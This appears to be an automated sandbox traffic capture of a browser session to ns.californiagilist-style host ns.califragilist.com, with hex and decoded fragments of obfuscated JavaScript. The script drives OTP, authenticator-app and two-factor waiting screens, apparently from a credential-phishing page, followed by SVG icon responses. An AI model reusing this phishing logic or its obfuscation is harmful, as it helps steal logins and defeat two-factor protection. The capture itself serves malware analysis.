                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 30 78 31 30 36 29 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 31 35 33 29 29 5b 5f 30 78 33 65 38 35 61 34 28 30 78 31 36 63 29 5d 28 29 29 3b 69 66 28 76 69 65 77 21 3d 3d 5f 30 78 33 65 38 35 61 34 28 30 78 31 34 61 29 26 26 76 69 65 77 21 3d 3d 5f 30 78 33 65 38 35 61 34 28 30 78 31 38 36 29 29 7b 69 66 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 33 65 38 35 61 34 28 30 78 31 33 37 29 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 31 34 33 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 32 31 62 29 29 21 3d 3d 6e 75 6c 6c 29 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 27 73 65 63 74 69 6f 6e 5f 27 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d
                                                                                                                                              Data Ascii: 0x106)](_0x3e85a4(0x153))[_0x3e85a4(0x16c)]());if(view!==_0x3e85a4(0x14a)&&view!==_0x3e85a4(0x186)){if(document[_0x3e85a4(0x137)](_0x3e85a4(0x143)+view)['querySelector'](_0x3e85a4(0x21b))!==null)document['getElementById']('section_'+view)['querySelector']
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 65 38 35 61 34 28 30 78 31 33 37 29 5d 28 5f 30 78 33 65 38 35 61 34 28 30 78 31 34 33 29 2b 76 69 65 77 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 27 23 62 74 6e 5f 76 65 72 69 66 79 6f 74 70 5f 6c 69 76 65 27 29 5b 27 63 6c 69 63 6b 27 5d 28 29 3b 7d 7d 7d 7d 7d 7d 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 76 61 6c 69 64 61 74 65 64 69 67 69 6e 70 28 5f 30 78 32 31 33 33 62 32 29 7b 63 6f 6e 73 74 20 5f 30 78 35 34 33 37 62 66 3d 5f 30 78 31 65 66 30 31 39 3b 5f 30 78 32 31 33 33 62 32 5b 5f 30 78 35 34 33 37 62 66 28 30 78 31 30 66 29 5d 3d 5f 30 78 32 31 33 33 62 32 5b 5f 30 78 35 34 33 37 62 66 28 30 78 31 30 66 29 5d 5b 27 72 65 70 6c 61 63 65 27 5d 28 2f 5c 44 2f 67 2c 27 27 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 69 6e 67 61 6e
                                                                                                                                              Data Ascii: e85a4(0x137)](_0x3e85a4(0x143)+view)['querySelector']('#btn_verifyotp_live')['click']();}}}}}}}});function validatediginp(_0x2133b2){const _0x5437bf=_0x1ef019;_0x2133b2[_0x5437bf(0x10f)]=_0x2133b2[_0x5437bf(0x10f)]['replace'](/\D/g,'');}function loadingan
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 35 64 36 30 65 30 28 30 78 61 34 29 5d 5b 5f 30 78 35 64 36 30 65 30 28 30 78 64 64 29 5d 3d 5f 30 78 35 64 36 30 65 30 28 30 78 31 62 39 29 2b 5f 30 78 31 66 66 30 64 31 2b 27 73 5c 78 32 30 27 2b 5f 30 78 33 33 39 65 33 34 2b 27 27 29 2c 5f 30 78 35 63 38 32 66 61 3d 3d 30 78 32 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 35 64 36 30 65 30 28 30 78 31 33 37 29 5d 28 5f 30 78 35 64 36 30 65 30 28 30 78 31 34 33 29 2b 5f 30 78 32 35 66 38 64 35 29 5b 5f 30 78 35 64 36 30 65 30 28 30 78 31 30 36 29 5d 28 5f 30 78 35 64 36 30 65 30 28 30 78 31 38 64 29 29 5b 27 73 74 79 6c 65 27 5d 5b 5f 30 78 35 64 36 30 65 30 28 30 78 64 64 29 5d 3d 5f 30 78 35 64 36 30 65 30 28 30 78 31 37 66 29 2b 5f 30 78 31 66 66 30 64 31 2b 27 73 5c 78 32 30 27 2b 5f 30 78 33 33 39
                                                                                                                                              Data Ascii: 5d60e0(0xa4)][_0x5d60e0(0xdd)]=_0x5d60e0(0x1b9)+_0x1ff0d1+'s\x20'+_0x339e34+''),_0x5c82fa==0x2&&(document[_0x5d60e0(0x137)](_0x5d60e0(0x143)+_0x25f8d5)[_0x5d60e0(0x106)](_0x5d60e0(0x18d))['style'][_0x5d60e0(0xdd)]=_0x5d60e0(0x17f)+_0x1ff0d1+'s\x20'+_0x339
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 32 29 5d 29 2c 63 68 65 63 6b 65 72 72 6f 72 64 65 73 63 28 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 63 29 2c 30 78 32 2c 5f 30 78 33 37 39 64 35 65 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 62 37 29 5d 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 33 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 61 70 70 27 29 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 35 29 5d 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 62 33 29 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 33 37 29 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 31 64 64 29 29 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 35 29 5d 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 32 36 29 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 76 69
                                                                                                                                              Data Ascii: 2)]),checkerrordesc(_0x28e288(0x26c),0x2,_0x379d5e[_0x28e288(0x1b7)]),document[_0x28e288(0x137)]('section_authapp')[_0x28e288(0x265)][_0x28e288(0x1b3)]('d-none'),document[_0x28e288(0x137)](_0x28e288(0x1dd))[_0x28e288(0x265)][_0x28e288(0x226)]('d-none'),vi
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 61 69 6e 5f 74 6f 6f 6d 61 6e 79 61 74 74 65 6d 70 74 73 27 29 5b 5f 30 78 31 32 62 37 66 64 28 30 78 61 34 29 5d 5b 5f 30 78 31 32 62 37 66 64 28 30 78 31 66 33 29 5d 3d 27 62 6c 6f 63 6b 27 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 32 62 37 66 64 28 30 78 31 33 37 29 5d 28 5f 30 78 31 32 62 37 66 64 28 30 78 31 37 63 29 29 5b 27 71 75 65 72 79 53 65 6c 65 63 74 6f 72 27 5d 28 5f 30 78 31 32 62 37 66 64 28 30 78 31 38 64 29 29 5b 5f 30 78 31 32 62 37 66 64 28 30 78 61 34 29 5d 5b 5f 30 78 31 32 62 37 66 64 28 30 78 64 64 29 5d 3d 27 73 68 6f 77 2d 66 72 6f 6d 2d 72 69 67 68 74 5c 78 32 30 30 2e 35 73 27 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 32 62 37 66 64 28 30 78 31 33 37 29 5d 28 5f 30 78 31 32 62 37 66 64 28 30 78 31 37 63 29 29 5b 5f 30 78 31 32
                                                                                                                                              Data Ascii: ain_toomanyattempts')[_0x12b7fd(0xa4)][_0x12b7fd(0x1f3)]='block',document[_0x12b7fd(0x137)](_0x12b7fd(0x17c))['querySelector'](_0x12b7fd(0x18d))[_0x12b7fd(0xa4)][_0x12b7fd(0xdd)]='show-from-right\x200.5s',document[_0x12b7fd(0x137)](_0x12b7fd(0x17c))[_0x12
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 61 75 74 68 61 70 70 5f 6c 69 76 65 27 29 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 36 35 29 5d 5b 27 74 6f 67 67 6c 65 27 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 32 35 66 29 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 38 65 32 38 38 28 30 78 31 33 37 29 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 31 64 33 29 29 5b 27 63 6c 61 73 73 4c 69 73 74 27 5d 5b 5f 30 78 32 38 65 32 38 38 28 30 78 32 32 36 29 5d 28 5f 30 78 32 38 65 32 38 38 28 30 78 32 35 66 29 29 2c 76 69 65 77 3d 5f 30 78 32 38 65 32 38 38 28 30 78 32 30 38 29 3b 7d 69 66 28 5f 30 78 33 37 39 64 35 65 5b 27 6d 65 73 73 61 67 65 27 5d 3d 3d 5f 30 78 32 38 65 32 38 38 28 30 78 32 31 38 29 29 7b 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                                              Data Ascii: 7)]('section_authapp_live')[_0x28e288(0x265)]['toggle'](_0x28e288(0x25f)),document[_0x28e288(0x137)](_0x28e288(0x1d3))['classList'][_0x28e288(0x226)](_0x28e288(0x25f)),view=_0x28e288(0x208);}if(_0x379d5e['message']==_0x28e288(0x218)){document['getElementB
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 30 2c 5f 30 78 34 35 61 66 37 38 29 3b 7d 2c 30 78 37 64 30 29 2c 5f 30 78 37 63 30 64 63 39 5b 27 6d 65 73 73 61 67 65 27 5d 3d 3d 27 64 75 70 6c 69 63 61 74 65 5c 78 32 30 72 65 71 75 65 73 74 27 26 26 28 77 61 69 74 32 66 61 63 61 6e 63 65 6c 3d 30 78 31 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 74 72 79 61 67 61 69 6e 6c 61 74 65 72 27 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 36 35 29 5d 5b 27 63 6f 6e 74 61 69 6e 73 27 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 32 35 66 29 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 31 37 63 29 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 30 36 29 5d 28 5f 30 78
                                                                                                                                              Data Ascii: 0,_0x45af78);},0x7d0),_0x7c0dc9['message']=='duplicate\x20request'&&(wait2facancel=0x1,document[_0x11576f(0x137)]('section_tryagainlater')[_0x11576f(0x265)]['contains'](_0x11576f(0x25f))&&(document[_0x11576f(0x137)](_0x11576f(0x17c))[_0x11576f(0x106)](_0x
                                                                                                                                              2024-11-06 15:56:03 UTC1369INData Raw: 32 31 29 29 5b 27 63 6c 61 73 73 4c 69 73 74 27 5d 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 32 36 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 32 35 66 29 29 2c 76 69 65 77 3d 27 66 69 6e 61 6c 27 29 2c 5f 30 78 37 63 30 64 63 39 5b 27 6d 65 73 73 61 67 65 27 5d 3d 3d 5f 30 78 31 31 35 37 36 66 28 30 78 64 35 29 26 26 28 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 31 65 61 29 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 36 35 29 5d 5b 27 74 6f 67 67 6c 65 27 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 31 31 35 37 36 66 28 30 78 31 33 37 29 5d 28 5f 30 78 31 31 35 37 36 66 28 30 78 31 32 31 29 29 5b 5f 30 78 31 31 35 37 36 66 28 30 78 32 36 35 29 5d 5b 5f
                                                                                                                                              Data Ascii: 21))['classList'][_0x11576f(0x226)](_0x11576f(0x25f)),view='final'),_0x7c0dc9['message']==_0x11576f(0xd5)&&(document[_0x11576f(0x137)](_0x11576f(0x1ea))[_0x11576f(0x265)]['toggle']('d-none'),document[_0x11576f(0x137)](_0x11576f(0x121))[_0x11576f(0x265)][_


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              78192.168.2.1849858188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1362OUTGET /mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:03 UTC1052INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:03 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="mnTXBHC8KHjpcgmT4J29cjPITNuPijXMtYQTHs1fF2R078145"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BhKoZQ8wOJkgCtU2NUyXjRnVpiQv8EYMwuk%2FHdgT90yFOeCFrt7OXq3OAFA8t6Q6N02JBm05eYaQPniPqNhx6QDFHQNJfH41nve%2BMb4S7s%2FqKOfWmKFxpxhoXPM8Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3304&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2282&delivery_rate=838448&cwnd=251&unsent_bytes=0&cid=9467f6422f649dd6&ts=135&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6457a48f783a7-DFW
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2086&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1940&delivery_rate=1302158&cwnd=247&unsent_bytes=0&cid=c5cb4a5e9d7215cf&ts=533&x=0"
                                                                                                                                              2024-11-06 15:56:03 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                                                                              Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                                                                              2024-11-06 15:56:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              79192.168.2.1849857188.114.97.34432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:56:03 UTC1364OUTGET /ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170 HTTP/1.1
                                                                                                                                              Host: ns.califragilist.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                              Referer: https://ns.califragilist.com/7PXU/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjlsbDRKdnpIZUhKTm9hTnl5RnNvZXc9PSIsInZhbHVlIjoiSmw1cWVFeHdFRWVHV291bkk2ZkdkQ3owaXR6b3JWeUNIb1IrWHBsTFkxczZhUElyYnZnellWc3dqVGNyYXdVUTdUUDI5S05tZVJmRjVBR0ZYY05qZWhpRGg1ZU5vRGxocXRkdDBWbnVWbFZLS0ZIcHhNelVTeENzcGF2R2szU0kiLCJtYWMiOiJkZDY3MmQ5OGVhYWQ1YjhmNmQxMWIzOTFhNDIxOTZmODM5YTdkNmU2MmJkMGU3OTQwNTBjZDY4MWMzYjJjZDdmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlhhdWJ1d0ExN3QzTHNxc3hUd2Y2NVE9PSIsInZhbHVlIjoiTVRHNlhqOTFRcStTT0MvY1c5TTh0THd1WmpyZUhZd2djMmxYa2o4M1V2aC9JVDRoM05lZ29ETTl5MXNQbzY3NkRkTjV5REhBdG1sMmR0cUZ0b3pzYlBRdWdHdVZVUzNpT2Y0bkNMdVN5T1RIYVNmV1lFT0NyTDU5TTRmbnVMMDgiLCJtYWMiOiIwZWJjMzU2OWYzY2Y5NmVkNzA3MGE0OGI5OGE1ZDExYjFmOTg3MmMzZDZhOWFlNjk3MWIwODIxZDRlZTFiZjRkIiwidGFnIjoiIn0%3D
                                                                                                                                              2024-11-06 15:56:04 UTC1061INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:56:04 GMT
                                                                                                                                              Content-Type: image/svg+xml
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: close
                                                                                                                                              Content-Disposition: inline; filename="ijfp9iKnrTgHCYE8rTpOvmRwx1aOUavp0AinFOw6GvICG656170"
                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GJdd8StotgLywGoG22lXiyszZ%2F1Qi3s0B2fk4wi%2Fy5HI%2FEPtp5l3WfMHSN%2F6%2F5e0Q%2F0V1KMQZaCCr%2B2W1FuQzKqfU98mXmvqR7riWTHGTuzPqn7zWj5f66uQvWam5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3501&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2283&delivery_rate=836269&cwnd=251&unsent_bytes=0&cid=696cd388468335a6&ts=145&x=0"
                                                                                                                                              vary: accept-encoding
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de6457a99d17b36-DEN
                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=19059&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1942&delivery_rate=151726&cwnd=32&unsent_bytes=0&cid=2550c415b591756e&ts=598&x=0"
                                                                                                                                              2024-11-06 15:56:04 UTC308INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                                                                              Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                                                                              2024-11-06 15:56:04 UTC1369INData Raw: 43 34 2e 35 30 30 31 39 20 32 30 2e 39 36 38 20 34 2e 35 30 30 34 31 20 32 30 2e 39 39 34 39 20 34 2e 35 30 30 36 36 20 32 31 2e 30 32 31 38 43 34 2e 35 30 30 32 32 20 32 31 2e 30 35 37 34 20 34 2e 35 20 32 31 2e 30 39 33 20 34 2e 35 20 32 31 2e 31 32 38 37 43 34 2e 35 35 30 32 31 20 32 38 2e 32 36 30 39 20 36 2e 38 30 39 36 37 20 33 39 2e 31 36 30 31 20 31 38 2e 36 30 39 31 20 34 36 2e 34 39 33 32 43 32 31 2e 38 32 32 35 20 34 38 2e 35 30 32 33 20 32 35 2e 38 38 39 36 20 34 38 2e 35 30 32 33 20 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 43 34 31 2e 30 35 33 20 33 39 2e 32 31 30 33 20 34 33 2e 33 31 32 35 20 32 38 2e 33 31 31 31 20 34 33 2e 33 31 32 35 20 32 31 2e 31 32 38 37 43 34 33 2e 33 31 32 35 20 32 31 2e 31 30 38 20 34 33 2e 33 31 32 34 20 32 31
                                                                                                                                              Data Ascii: C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21
                                                                                                                                              2024-11-06 15:56:04 UTC1369INData Raw: 38 2e 36 30 39 31 20 34 36 2e 34 39 33 32 43 32 31 2e 38 32 32 35 20 34 38 2e 35 30 32 33 20 32 35 2e 38 38 39 36 20 34 38 2e 35 30 32 33 20 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 43 34 31 2e 30 35 33 20 33 39 2e 32 31 30 33 20 34 33 2e 33 31 32 35 20 32 38 2e 33 31 31 31 20 34 33 2e 33 31 32 35 20 32 31 2e 31 32 38 37 43 34 33 2e 33 31 32 35 20 32 31 2e 31 30 38 20 34 33 2e 33 31 32 34 20 32 31 2e 30 38 37 32 20 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 43 34 33 2e 33 31 32 34 20 32 31 2e 30 32 34 36 20 34 33 2e 33 31 32 35 20 32 30 2e 39 38 32 39 20 34 33 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 34 33 2e 33 31 32 35 20 31 37 2e 33 33 37 31 20 34 31 2e 30 30 35 35 20 31 34 2e 31 39 34 36 20 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 43 33 37
                                                                                                                                              Data Ascii: 8.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37
                                                                                                                                              2024-11-06 15:56:04 UTC1369INData Raw: 4c 32 37 2e 30 35 36 33 20 34 33 2e 30 38 36 39 4c 32 39 2e 31 35 33 32 20 34 36 2e 34 39 33 32 5a 4d 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 4c 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 33 39 2e 33 31 32 32 20 32 31 2e 30 37 33 39 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 4c 34 33 2e 33 31 32 33 20 32 31 2e 30 36 36 35 5a 4d 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 4c 33 33 2e 36 38 32 34 20 31 33 2e 33 37 33 38 4c 33 33 2e 38 38 38 20 31 36 2e 30 30 31 36 4c 33 36 2e 33 38 33 38 20 31 36 2e 38 34 39 33 4c 33 37 2e 36 37 30 32 20 31 33 2e 30 36 31 38 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 4c 38 2e 36 30 36 36 20 33 36 2e 37 38 36 36 4c 37 2e 35 36 32 37 37 20 33 39 2e 30 33 37 34 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32
                                                                                                                                              Data Ascii: L27.0563 43.0869L29.1532 46.4932ZM43.3123 21.0665L39.3123 21.0519L39.3122 21.0739L39.3124 21.096L43.3123 21.0665ZM37.6702 13.0618L33.6824 13.3738L33.888 16.0016L36.3838 16.8493L37.6702 13.0618ZM12.2354 38.4694L8.6066 36.7866L7.56277 39.0374L9.11539 40.972
